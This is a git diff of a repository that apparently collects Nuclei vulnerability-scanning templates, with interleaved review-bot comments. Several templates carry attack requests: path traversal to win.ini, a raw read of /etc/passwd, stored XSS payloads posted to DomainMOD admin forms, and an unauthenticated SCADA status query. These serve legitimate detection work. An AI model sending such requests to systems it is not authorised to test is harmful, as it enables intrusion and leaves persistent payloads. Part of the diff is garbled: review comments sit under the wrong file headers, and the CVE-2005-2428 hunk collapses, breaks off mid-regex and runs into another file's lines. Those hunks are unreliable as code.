diff --git a/README.md b/README.md
index 0234213ca2..fd51cb3eb6 100644
--- a/README.md
+++ b/README.md
@@ -20,21 +20,70 @@
 | CVE-2016 | 249 |
 | CVE-2017 | 395 |
 | CVE-2018 | 445 |
-| CVE-2019 | 512 |
-| CVE-2020 | 592 |
-| CVE-2021 | 1733 |
+| CVE-2019 | 513 |
+| CVE-2020 | 591 |
+| CVE-2021 | 1731 |
 | CVE-2022 | 2462 |
-| CVE-2023 | 4747 |
-| CVE-2024 | 4733 |
-| Other | 23846 |
+| CVE-2023 | 4749 |
+| CVE-2024 | 4759 |
+| Other | 23866 |
 ## 近几天数量变化情况
-|2024-08-21 | 2024-08-22 | 2024-08-23 | 2024-08-24 | 2024-08-25 | 2024-08-26 | 2024-08-27|
+|2024-08-22 | 2024-08-23 | 2024-08-24 | 2024-08-25 | 2024-08-26 | 2024-08-27 | 2024-08-28|
 |--- | ------ | ------ | ------ | ------ | ------ | ---|
-|41281 | 41305 | 41313 | 41401 | 41421 | 41432 | 41435|
+|41305 | 41313 | 41401 | 41421 | 41432 | 41435 | 41481|
 ## 最近新增文件
 | templates name |
 | --- |
-| xui-default-login.yaml |
-| cookie-consent-detection.yaml |
-| anything-llm.yaml |
-| CVE-2024-6842.yaml |
+| ilc-thickbox.yaml |
+| Square-oauth-secret.yaml |
+| Sendgrid-api.yaml |
+| umbraco-delivery-api.yaml |
+| blogintroduction-wordpress-plugin.yaml |
+| mm-breaking-news.yaml |
+| Pictatic-API-key.yaml |
+| misiek-photo-album.yaml |
+| malwared-byob.yaml |
+| music-request-manager.yaml |
+| couchdb-default-login.yaml |
+| visual-sound.yaml |
+| reviews-feed.yaml |
+| Square-access-token.yaml |
+| simple-headline-rotator.yaml |
+| azindex.yaml |
+| malwared-byob-rce.yaml |
+| gixaw-chat.yaml |
+| Shopify-token.yaml |
+| rundeck-default-login.yaml |
+| pocket-widget.yaml |
+| quick-code.yaml |
+| misiek-paypal.yaml |
+| wccp-pro.yaml |
+| jellyfin-default-login.yaml |
+| CVE-2023-46818.yaml |
+| CVE-2024-5827.yaml |
+| CVE-2024-7818.yaml |
+| CVE-2024-8197.yaml |
+| CVE-2024-7687.yaml |
+| CVE-2024-7820.yaml |
+| CVE-2024-7860.yaml |
+| CVE-2024-8046.yaml |
+| CVE-2024-6019.yaml |
+| CVE-2024-6017.yaml |
+| CVE-2024-7817.yaml |
+| CVE-2024-7688.yaml |
+| CVE-2024-6690.yaml |
+| CVE-2024-7918.yaml |
+| CVE-2024-8054.yaml |
+| CVE-2024-7791.yaml |
+| CVE-2024-7304.yaml |
+| CVE-2024-6804.yaml |
+| CVE-2024-7822.yaml |
+| CVE-2024-8199.yaml |
+| CVE-2024-6688.yaml |
+| CVE-2024-6018.yaml |
+| CVE-2024-7861.yaml |
+| CVE-2024-8056.yaml |
+| CVE-2024-7862.yaml |
+| CVE-2024-7816.yaml |
+| CVE-2024-8200.yaml |
+| CVE-2024-6693.yaml |
diff --git a/data.json b/data.json
index 6a1a301c43..79699d5ce8 100644
--- a/data.json
+++ b/data.json
@@ -171,5 +171,6 @@
 "2024-08-24": 41401,
 "2024-08-25": 41421,
 "2024-08-26": 41432,
- "2024-08-27": 41435
+ "2024-08-27": 41435,
+ "2024-08-28": 41481
 }
\ No newline at end of file
diff --git a/data1.json b/data1.json
index 47143c26f6..b1ed791603 100644
--- a/data1.json
+++ b/data1.json
@@ -49033,5 +49033,58 @@
 "xui-default-login.yaml": "2024-08-27 02:16:21",
 "cookie-consent-detection.yaml": "2024-08-27 02:16:21",
 "anything-llm.yaml": "2024-08-27 02:16:21",
- "CVE-2024-6842.yaml": "2024-08-27 02:16:21"
+ "CVE-2024-6842.yaml": "2024-08-27 02:16:21",
+ "ilc-thickbox.yaml": "2024-08-28 02:17:54",
+ "Square-oauth-secret.yaml": "2024-08-28 02:17:54",
+ "Sendgrid-api.yaml": "2024-08-28 02:17:54",
+ "umbraco-delivery-api.yaml": "2024-08-28 02:17:54",
+ "blogintroduction-wordpress-plugin.yaml": "2024-08-28 02:17:54",
+ "mm-breaking-news.yaml": "2024-08-28 02:17:54",
+ "Pictatic-API-key.yaml": "2024-08-28 02:17:54",
+ "misiek-photo-album.yaml": "2024-08-28 02:17:54",
+ "malwared-byob.yaml": "2024-08-28 02:17:54",
+ "music-request-manager.yaml": "2024-08-28 02:17:54",
+ "couchdb-default-login.yaml": "2024-08-28 02:17:54",
+ "visual-sound.yaml": "2024-08-28 02:17:54",
+ "reviews-feed.yaml": "2024-08-28 02:17:54",
+ "Square-access-token.yaml": "2024-08-28 02:17:54",
+ "simple-headline-rotator.yaml": "2024-08-28 02:17:54",
+ "azindex.yaml": "2024-08-28 02:17:54",
+ "malwared-byob-rce.yaml": "2024-08-28 02:17:54",
+ "gixaw-chat.yaml": "2024-08-28 02:17:54",
+ "Shopify-token.yaml": "2024-08-28 02:17:54",
+ "rundeck-default-login.yaml": "2024-08-28 02:17:54",
+ "pocket-widget.yaml": "2024-08-28 02:17:54",
+ "quick-code.yaml": "2024-08-28 02:17:54",
+ "misiek-paypal.yaml": "2024-08-28 02:17:54",
+ "wccp-pro.yaml": "2024-08-28 02:17:54",
+ "jellyfin-default-login.yaml": "2024-08-28 02:17:54",
+ "CVE-2023-46818.yaml": "2024-08-28 02:17:54",
+ "CVE-2024-5827.yaml": "2024-08-28 02:17:54",
+ "CVE-2024-7818.yaml": "2024-08-28 02:17:54",
+ "CVE-2024-8197.yaml": "2024-08-28 02:17:54",
+ "CVE-2024-7687.yaml": "2024-08-28 02:17:54",
+ "CVE-2024-7820.yaml": "2024-08-28 02:17:54",
+ "CVE-2024-7860.yaml": "2024-08-28 02:17:54",
+ "CVE-2024-8046.yaml": "2024-08-28 02:17:54",
+ "CVE-2024-6019.yaml": "2024-08-28 02:17:54",
+ "CVE-2024-6017.yaml": "2024-08-28 02:17:54",
+ "CVE-2024-7817.yaml": "2024-08-28 02:17:54",
+ "CVE-2024-7688.yaml": "2024-08-28 02:17:54",
+ "CVE-2024-6690.yaml": "2024-08-28 02:17:54",
+ "CVE-2024-7918.yaml": "2024-08-28 02:17:54",
+ "CVE-2024-8054.yaml": "2024-08-28 02:17:54",
+ "CVE-2024-7791.yaml": "2024-08-28 02:17:54",
+ "CVE-2024-7304.yaml": "2024-08-28 02:17:54",
+ "CVE-2024-6804.yaml": "2024-08-28 02:17:54",
+ "CVE-2024-7822.yaml": "2024-08-28 02:17:54",
+ "CVE-2024-8199.yaml": "2024-08-28 02:17:54",
+ "CVE-2024-6688.yaml": "2024-08-28 02:17:54",
+ "CVE-2024-6018.yaml": "2024-08-28 02:17:54",
+ "CVE-2024-7861.yaml": "2024-08-28 02:17:54",
+ "CVE-2024-8056.yaml": "2024-08-28 02:17:54",
+ "CVE-2024-7862.yaml": "2024-08-28 02:17:54",
+ "CVE-2024-7816.yaml": "2024-08-28 02:17:54",
+ "CVE-2024-8200.yaml": "2024-08-28 02:17:54",
+ "CVE-2024-6693.yaml": "2024-08-28 02:17:54"
 }
\ No newline at end of file
diff --git a/links.csv b/links.csv
index f0ea0f3e7a..6724d5b96f 100644
--- a/links.csv
+++ b/links.csv
@@ -444,3 +444,8 @@ https://github.com/vaampz/priv8-Nuclei
 https://github.com/Unrealisedd/nuclei-templates
 https://github.com/smn666/Nuclei_templates_2024
 https://github.com/juanschallibaum/CVE-2024-38473-Nuclei-Template
+https://github.com/emanueldosreis/CVE-2024-38856
+https://github.com/stvnhrlnd/umbraco-nuclei-templates
+https://github.com/jhonnybonny/nuclei-templates
+https://github.com/fa-rrel/Nuclei-templates-xd
+https://github.com/Kuray12/prv8_nuclei_templates
diff --git a/nuclei-templates/CVE-2000/CVE-2000-0114.yaml b/nuclei-templates/CVE-2000/CVE-2000-0114.yaml
new file mode 100644
index 0000000000..ecff9b7b80
--- /dev/null
+++ b/nuclei-templates/CVE-2000/CVE-2000-0114.yaml
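Review bot: The five appended sources are bare repository URLs with no commit pin or content hash, so whatever those repositories push next is pulled into nuclei-templates/ on the next run; the README and data1.json hunks in this same commit show 53 templates landing from one day's sync, which makes this list the effective trust boundary for everything executed by nuclei downstream. Two of the names here (`prv8_nuclei_templates`, and `priv8-Nuclei` in the context line) advertise unreviewed private templates. Consider recording a pinned ref alongside each source, e.g. `https://github.com/Kuray12/prv8_nuclei_templates,<commit-sha>`, and — presumably the importer runs unattended, confirm — having it refuse templates that use protocols with local side effects (nuclei `code`/`javascript` templates) unless a source is explicitly allowlisted.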
@@ -0,0 +1,32 @@
+id: CVE-2000-0114
+
+info:
+ name: Microsoft FrontPage Extensions Check (shtml.dll)
+ author: r3naissance
+ severity: low
+ description: Frontpage Server Extensions allows remote attackers to determine the name of the anonymous account via an RPC POST request to shtml.dll in the /_vti_bin/ virtual directory.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2000-0114
+ - https://www.exploit-db.com/exploits/19897
+ classification:
+ cve-id: CVE-2000-0114
+ remediation: Upgrade to the latest version.
+ tags: cve,cve2000,frontpage,microsoft,edb
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/_vti_inf.html'
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: body
+ words:
+ - "_vti_bin/shtml.dll"
+
+# Enhanced by mp on 2022/01/27
diff --git a/nuclei-templates/CVE-2000/cve-2000-0114.yaml b/nuclei-templates/CVE-2000/cve-2000-0114.yaml
deleted file mode 100644
index 0050d0c90c..0000000000
--- a/nuclei-templates/CVE-2000/cve-2000-0114.yaml
+++ /dev/null
@@ -1,32 +0,0 @@
-id: CVE-2000-0114
-
-info:
- name: Microsoft FrontPage Extensions Check (shtml.dll)
- author: r3naissance
- severity: low
- description: Frontpage Server Extensions allows remote attackers to determine the name of the anonymous account via an RPC POST request to shtml.dll in the /_vti_bin/ virtual directory.
- reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2000-0114
- - https://www.exploit-db.com/exploits/19897
- classification:
- cve-id: CVE-2000-0114
- remediation: Upgrade to the latest version.
- tags: cve,cve2000,frontpage,microsoft
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/_vti_inf.html'
-
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
-
- - type: word
- part: body
- words:
- - "_vti_bin/shtml.dll"
-
-# Enhanced by mp on 2022/01/27
diff --git a/nuclei-templates/CVE-2001/CVE-2001-1473.yaml b/nuclei-templates/CVE-2001/CVE-2001-1473.yaml
new file mode 100644
index 0000000000..d7ad14a2d1
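Review bot: The description promises an RPC POST to `/_vti_bin/shtml.dll` that leaks the anonymous account name, but the only request is `GET /_vti_inf.html` matched on the string `_vti_bin/shtml.dll`, which any FrontPage Server Extensions install serves whether or not it is vulnerable — the result is a fingerprint, not a verification of CVE-2000-0114. Say so in the template so a hit is not reported as confirmed, e.g. `# NOTE: presence check for FrontPage Server Extensions only; the shtml.dll RPC disclosure is not exercised`, or add the POST from the exploit-db reference and match on the account name in its response. `requests:` is also the pre-v3 protocol key (current nuclei templates use `http:`); the deleted lower-case twin in this same hunk has an identical body, so the only functional change here is the added `edb` tag.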
--- /dev/null
+++ b/nuclei-templates/CVE-2001/CVE-2001-1473.yaml
@@ -0,0 +1,26 @@
+id: CVE-2001-1473
+info:
+ name: Deprecated SSHv1 Protocol Detection
+ author: iamthefrogy
+ severity: high
+ tags: cve,cve2001,network,ssh,openssh
+ description: SSHv1 is deprecated and has known cryptographic issues.
+ remediation: Upgrade to SSH 2.4 or later.
+ reference:
+ - https://www.kb.cert.org/vuls/id/684820
+ - https://nvd.nist.gov/vuln/detail/CVE-2001-1473
+ classification:
+ cvss-score: 7.4
+ cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
+ cve-id: CVE-2001-1473
+ cwe-id: CWE-310
+network:
+ - host:
+ - "{{Hostname}}"
+ - "{{Host}}:22"
+ matchers:
+ - type: word
+ words:
+ - "SSH-1"
+
+# Updated by Chris on 2022/01/21
diff --git a/nuclei-templates/CVE-2001/cve-2001-1473.yaml b/nuclei-templates/CVE-2001/cve-2001-1473.yaml
deleted file mode 100644
index 80480efb7b..0000000000
--- a/nuclei-templates/CVE-2001/cve-2001-1473.yaml
+++ /dev/null
@@ -1,26 +0,0 @@
-id: CVE-2001-1473
-
-info:
- name: Deprecated SSHv1 Protocol Detection
- author: iamthefrogy
- severity: high
-
- description: SSHv1 is deprecated and has known cryptographic issues.
- reference:
- - https://www.kb.cert.org/vuls/id/684820
- - https://nvd.nist.gov/vuln/detail/CVE-2001-1473
- classification:
- cvss-score: 7.4
- cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
- cve-id: CVE-2001-1473
- cwe-id: CWE-310
-
-network:
- - host:
- - "{{Hostname}}"
- - "{{Host}}:22"
-
- matchers:
- - type: word
- words:
- - "SSH-1"
diff --git a/nuclei-templates/CVE-2004/cve-2004-0519.yaml b/nuclei-templates/CVE-2004/CVE-2004-0519.yaml
similarity index 100%
rename from nuclei-templates/CVE-2004/cve-2004-0519.yaml
rename to nuclei-templates/CVE-2004/CVE-2004-0519.yaml
diff --git a/nuclei-templates/CVE-2005/CVE-2005-2428.yaml b/nuclei-templates/CVE-2005/CVE-2005-2428.yaml
new file mode 100644
index 0000000000..c74c52c360
--- /dev/null
+++ b/nuclei-templates/CVE-2005/CVE-2005-2428.yaml
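Review bot: The banner matcher `SSH-1` is a substring match, so it fires on `SSH-1.99-…` banners as well as `SSH-1.5-…`; a 1.99 server negotiates both protocol 1 and 2, which is a genuine v1 exposure but calls for a different fix (disable protocol 1) than a v1-only host, and the template reports both at `severity: high` without distinguishing them. Document that in the template, e.g. `# matches "SSH-1.5" (v1 only) and "SSH-1.99" (v1+v2, v1 still negotiable); "SSH-2.0"-only servers do not match`. The `host` list probes both `{{Hostname}}` and `{{Host}}:22`, so an input that already carries port 22 is banner-grabbed twice. The new `remediation: Upgrade to SSH 2.4 or later` names no product; presumably it means the SSH-2 protocol or an OpenSSH release — confirm and reword.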
@@ -0,0 +1,33 @@ +id: CVE-2005-2428 +info: + name: Lotus Domino R5 and R6 WebMail Default Configuration Information Disclosure + author: CasperGN + severity: medium + tags: cve,cve2005,domino + description: Lotus Domino R5 and R6 WebMail with 'Generate HTML for all fields' enabled allows remote attackers to read the HTML source to obtain sensitive information including the password hash in the HTTPPassword field, the password change date in the HTTPPasswordChangeDate field, and the client Lotus Domino release in the ClntBld field (a different vulnerability than CVE-2005-2696). + remediation: Ensure proper firewalls are in place within your environment to prevent public exposure of the names.nsf database and other sensitive files. + reference: + - http://www.cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf + - https://www.exploit-db.com/exploits/39495 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2005-2428 + cwe-id: CWE-200 + +requests: + - method: GET + path: + - "{{BaseURL}}/names.nsf/People?OpenView" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: regex + name: domino-username + regex: + - '(" - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2018/cve-2018-10095.yaml b/nuclei-templates/CVE-2018/CVE-2018-10095.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-10095.yaml rename to nuclei-templates/CVE-2018/CVE-2018-10095.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-10823.yaml b/nuclei-templates/CVE-2018/CVE-2018-10823.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-10823.yaml rename to nuclei-templates/CVE-2018/CVE-2018-10823.yaml 
diff --git a/nuclei-templates/CVE-2018/cve-2018-11409.yaml b/nuclei-templates/CVE-2018/CVE-2018-11409.yaml
similarity index 100%
rename from nuclei-templates/CVE-2018/cve-2018-11409.yaml
rename to nuclei-templates/CVE-2018/CVE-2018-11409.yaml
diff --git a/nuclei-templates/CVE-2018/cve-2018-11776.yaml b/nuclei-templates/CVE-2018/CVE-2018-11776.yaml
similarity index 100%
rename from nuclei-templates/CVE-2018/cve-2018-11776.yaml
rename to nuclei-templates/CVE-2018/CVE-2018-11776.yaml
diff --git a/nuclei-templates/CVE-2018/cve-2018-12031.yaml b/nuclei-templates/CVE-2018/CVE-2018-12031.yaml
similarity index 100%
rename from nuclei-templates/CVE-2018/cve-2018-12031.yaml
rename to nuclei-templates/CVE-2018/CVE-2018-12031.yaml
diff --git a/nuclei-templates/CVE-2018/cve-2018-12054.yaml b/nuclei-templates/CVE-2018/CVE-2018-12054.yaml
similarity index 100%
rename from nuclei-templates/CVE-2018/cve-2018-12054.yaml
rename to nuclei-templates/CVE-2018/CVE-2018-12054.yaml
diff --git a/nuclei-templates/CVE-2018/cve-2018-12095.yaml b/nuclei-templates/CVE-2018/CVE-2018-12095.yaml
similarity index 100%
rename from nuclei-templates/CVE-2018/cve-2018-12095.yaml
rename to nuclei-templates/CVE-2018/CVE-2018-12095.yaml
diff --git a/nuclei-templates/CVE-2018/CVE-2018-1271.yaml b/nuclei-templates/CVE-2018/CVE-2018-1271.yaml
deleted file mode 100644
index 548327e206..0000000000
--- a/nuclei-templates/CVE-2018/CVE-2018-1271.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: CVE-2018-1271
-info:
- name: Spring MVC Directory Traversal Vulnerability
- author: hetroublemakr
- severity: medium
- description: Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). When static resources are served from a file system on Windows (as opposed to the classpath, or the ServletContext), a malicious user can send a request using a specially crafted URL that can lead a directory traversal attack.
- reference:
- - https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d
- - https://pivotal.io/security/cve-2018-1271
- - http://web.archive.org/web/20210518132800/https://www.securityfocus.com/bid/103699
- - https://access.redhat.com/errata/RHSA-2018:1320
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
- cvss-score: 5.9
- cve-id: CVE-2018-1271
- cwe-id: CWE-22
- tags: cve,cve2018,spring,lfi,traversal
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini'
- - '{{BaseURL}}/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini'
- matchers-condition: and
- matchers:
- - type: word
- words:
- - 'for 16-bit app support'
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/CVE-2018/cve-2018-1273.yaml b/nuclei-templates/CVE-2018/CVE-2018-1273.yaml
similarity index 100%
rename from nuclei-templates/CVE-2018/cve-2018-1273.yaml
rename to nuclei-templates/CVE-2018/CVE-2018-1273.yaml
diff --git a/nuclei-templates/CVE-2018/cve-2018-13980.yaml b/nuclei-templates/CVE-2018/CVE-2018-13980.yaml
similarity index 100%
rename from nuclei-templates/CVE-2018/cve-2018-13980.yaml
rename to nuclei-templates/CVE-2018/CVE-2018-13980.yaml
diff --git a/nuclei-templates/CVE-2018/cve-2018-14474.yaml b/nuclei-templates/CVE-2018/CVE-2018-14474.yaml
similarity index 100%
rename from nuclei-templates/CVE-2018/cve-2018-14474.yaml
rename to nuclei-templates/CVE-2018/CVE-2018-14474.yaml
diff --git a/nuclei-templates/CVE-2018/cve-2018-15517.yaml b/nuclei-templates/CVE-2018/CVE-2018-15517.yaml
similarity index 100%
rename from nuclei-templates/CVE-2018/cve-2018-15517.yaml
rename to nuclei-templates/CVE-2018/CVE-2018-15517.yaml
diff --git a/nuclei-templates/CVE-2018/cve-2018-15640.yaml b/nuclei-templates/CVE-2018/CVE-2018-15640.yaml
similarity index 100%
rename from nuclei-templates/CVE-2018/cve-2018-15640.yaml
rename to nuclei-templates/CVE-2018/CVE-2018-15640.yaml
diff --git a/nuclei-templates/CVE-2018/cve-2018-15961.yaml b/nuclei-templates/CVE-2018/CVE-2018-15961.yaml
similarity index 100%
rename from nuclei-templates/CVE-2018/cve-2018-15961.yaml
rename to nuclei-templates/CVE-2018/CVE-2018-15961.yaml
diff --git a/nuclei-templates/CVE-2018/cve-2018-16167.yaml b/nuclei-templates/CVE-2018/CVE-2018-16167.yaml
similarity index 100%
rename from nuclei-templates/CVE-2018/cve-2018-16167.yaml
rename to nuclei-templates/CVE-2018/CVE-2018-16167.yaml
diff --git a/nuclei-templates/CVE-2018/cve-2018-16288.yaml b/nuclei-templates/CVE-2018/CVE-2018-16288.yaml
similarity index 100%
rename from nuclei-templates/CVE-2018/cve-2018-16288.yaml
rename to nuclei-templates/CVE-2018/CVE-2018-16288.yaml
diff --git a/nuclei-templates/CVE-2018/cve-2018-16668.yaml b/nuclei-templates/CVE-2018/CVE-2018-16668.yaml
similarity index 100%
rename from nuclei-templates/CVE-2018/cve-2018-16668.yaml
rename to nuclei-templates/CVE-2018/CVE-2018-16668.yaml
diff --git a/nuclei-templates/CVE-2018/CVE-2018-16670.yaml b/nuclei-templates/CVE-2018/CVE-2018-16670.yaml
new file mode 100644
index 0000000000..b253aecfda
--- /dev/null
+++ b/nuclei-templates/CVE-2018/CVE-2018-16670.yaml
@@ -0,0 +1,33 @@
+id: CVE-2018-16670
+
+info:
+ name: CirCarLife SCADA PLC Status
+ description: PLC status disclosure due to lack of authentication
+ reference:
+ - https://www.exploit-db.com/exploits/45384
+ author: geeknik
+ severity: medium
+ tags: cve,cve2018,circarlife,scada,plc,iot,disclosure
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.30
+ cve-id: CVE-2018-16670
+ cwe-id: CWE-287
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/services/user/values.xml?var=STATUS"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: header
+ words:
+ - "CirCarLife Scada"
+ - type: word
+ part: body
+ words:
+ - ""
+ - "Reader.STATUS"
+ condition: and
diff --git a/nuclei-templates/CVE-2018/cve-2018-16671.yaml b/nuclei-templates/CVE-2018/CVE-2018-16671.yaml
similarity index 100%
rename from nuclei-templates/CVE-2018/cve-2018-16671.yaml
rename to nuclei-templates/CVE-2018/CVE-2018-16671.yaml
diff --git a/nuclei-templates/CVE-2018/cve-2018-16761.yaml b/nuclei-templates/CVE-2018/CVE-2018-16761.yaml
similarity index 100%
rename from nuclei-templates/CVE-2018/cve-2018-16761.yaml
rename to nuclei-templates/CVE-2018/CVE-2018-16761.yaml
diff --git a/nuclei-templates/CVE-2018/cve-2018-16763.yaml b/nuclei-templates/CVE-2018/CVE-2018-16763.yaml
similarity index 100%
rename from nuclei-templates/CVE-2018/cve-2018-16763.yaml
rename to nuclei-templates/CVE-2018/CVE-2018-16763.yaml
diff --git a/nuclei-templates/CVE-2018/cve-2018-17422.yaml b/nuclei-templates/CVE-2018/CVE-2018-17422.yaml
similarity index 100%
rename from nuclei-templates/CVE-2018/cve-2018-17422.yaml
rename to nuclei-templates/CVE-2018/CVE-2018-17422.yaml
diff --git a/nuclei-templates/CVE-2018/cve-2018-18323.yaml b/nuclei-templates/CVE-2018/CVE-2018-18323.yaml
similarity index 100%
rename from nuclei-templates/CVE-2018/cve-2018-18323.yaml
rename to nuclei-templates/CVE-2018/CVE-2018-18323.yaml
diff --git a/nuclei-templates/CVE-2018/CVE-2018-18778.yaml b/nuclei-templates/CVE-2018/CVE-2018-18778.yaml
deleted file mode 100644
index 6c269ecee5..0000000000
--- a/nuclei-templates/CVE-2018/CVE-2018-18778.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: CVE-2018-18778
-info:
- name: mini_httpd Path Traversal
- author: dhiyaneshDK
- severity: medium
- description: ACME mini_httpd before 1.30 lets remote users read arbitrary files.
- reference:
- - https://www.acunetix.com/vulnerabilities/web/acme-mini_httpd-arbitrary-file-read/
- - http://www.acme.com/software/mini_httpd/
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
- cvss-score: 6.5
- cve-id: CVE-2018-18778
- cwe-id: CWE-200
- tags: cve,cve2018,lfi,mini_httpd
-requests:
- - raw:
- - |+
- GET /etc/passwd HTTP/1.1
- Host:
-
- unsafe: true
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
- - type: regex
- regex:
- - "root:.*:0:0:"
diff --git a/nuclei-templates/CVE-2018/CVE-2018-19751.yaml b/nuclei-templates/CVE-2018/CVE-2018-19751.yaml
new file mode 100644
index 0000000000..e6ff1a9869
--- /dev/null
+++ b/nuclei-templates/CVE-2018/CVE-2018-19751.yaml
@@ -0,0 +1,52 @@
+id: CVE-2018-19751
+info:
+ name: DomainMOD 4.11.01 - Cross-Site Scripting
+ author: arafatansari
+ severity: medium
+ description: |
+ DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via /admin/ssl-fields/add.php Display Name, Description & Notes fields parameters.
+ reference:
+ - https://www.exploit-db.com/exploits/45947/
+ - https://nvd.nist.gov/vuln/detail/CVE-2018-19751
+ - https://github.com/domainmod/domainmod/issues/83
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 4.8
+ cve-id: CVE-2018-19751
+ cwe-id: CWE-79
+ metadata:
+ verified: "true"
+ tags: cve,cve2018,domainmod,xss,authenticated
+requests:
+ - raw:
+ - |
+ POST / HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ new_username={{username}}&new_password={{password}}
+ - |
+ POST /admin/ssl-fields/add.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ new_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_field_name=new&new_field_type_id=1&new_description=test&new_notes=test
+ - |
+ GET /admin/ssl-fields/ HTTP/1.1
+ Host: {{Hostname}}
+ cookie-reuse: true
+ redirects: true
+ max-redirects: 2
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '">'
+ - type: word
+ part: header
+ words:
+ - text/html
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2018/CVE-2018-19752.yaml b/nuclei-templates/CVE-2018/CVE-2018-19752.yaml
new file mode 100644
index 0000000000..4876f6389a
--- /dev/null
+++ b/nuclei-templates/CVE-2018/CVE-2018-19752.yaml
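Review bot: The second request stores a `<script>` payload in the target's SSL-field list via `POST /admin/ssl-fields/add.php` and nothing removes it, so every scan leaves persistent XSS in the customer's DomainMOD instance; mark that in the tags, `tags: cve,cve2018,domainmod,xss,authenticated,intrusive`, so the template is excluded from non-intrusive runs. The word/header/status matchers are not tied to a specific response: without `req-condition: true` nuclei, as I read its raw-request semantics, evaluates them against each of the three responses, so a hit can come from the login or the POST response rather than from the listing page the template is meant to check. The sibling CVE-2018-19914 and CVE-2018-19915 templates in this same commit already use `req-condition: true` with `status_code_3`/`body_3`; this one should follow the same shape. The body word is rendered here as `'">'`, presumably the script payload lost in display — confirm the matcher string actually committed.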
@@ -0,0 +1,52 @@
+id: CVE-2018-19752
+info:
+ name: DomainMOD 4.11.01 - Cross-Site Scripting
+ author: arafatansari
+ severity: medium
+ description: |
+ DomainMOD through 4.11.01 has XSS via the assets/add/registrar.php notes,registrar field.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2018-19752
+ - https://github.com/domainmod/domainmod/issues/84
+ - https://www.exploit-db.com/exploits/45949/
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 4.8
+ cve-id: CVE-2018-19752
+ cwe-id: CWE-79
+ metadata:
+ verified: "true"
+ tags: cve,cve2018,domainmod,xss,authenticated
+requests:
+ - raw:
+ - |
+ POST / HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ new_username={{username}}&new_password={{password}}
+ - |
+ POST /assets/add/registrar.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ new_registrar=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=test&new_api_registrar_id=0&new_notes=test
+ - |
+ GET /assets/registrars.php HTTP/1.1
+ Host: {{Hostname}}
+ cookie-reuse: true
+ redirects: true
+ max-redirects: 2
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '">'
+ - type: word
+ part: header
+ words:
+ - text/html
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2018/CVE-2018-19892.yaml b/nuclei-templates/CVE-2018/CVE-2018-19892.yaml
deleted file mode 100644
index 70ca1dc6b6..0000000000
--- a/nuclei-templates/CVE-2018/CVE-2018-19892.yaml
+++ /dev/null
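Review bot: The description says the XSS is in the `notes,registrar` fields, but the payload is only placed in `new_registrar` while `new_notes=test`, so the notes sink is posted to and never exercised — either put the payload in `new_notes` as well or narrow the description to the registrar field. The matchers have no `req-condition: true`, so they are checked against every response rather than only the final `GET /assets/registrars.php`; a `POST /assets/add/registrar.php` response that merely echoes the submitted value could satisfy the body word before anything is persisted and rendered. CVE-2018-19915 in this commit pins its checks with `status_code_3`/`body_3`, and this template should use the same form. The stored payload is not cleaned up afterwards, so `intrusive` belongs in `tags`.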
@@ -1,51 +0,0 @@
-id: CVE-2018-19892
-info:
- name: DomainMOD 4.11.01 - Cross-Site Scripting
- author: arafatansari
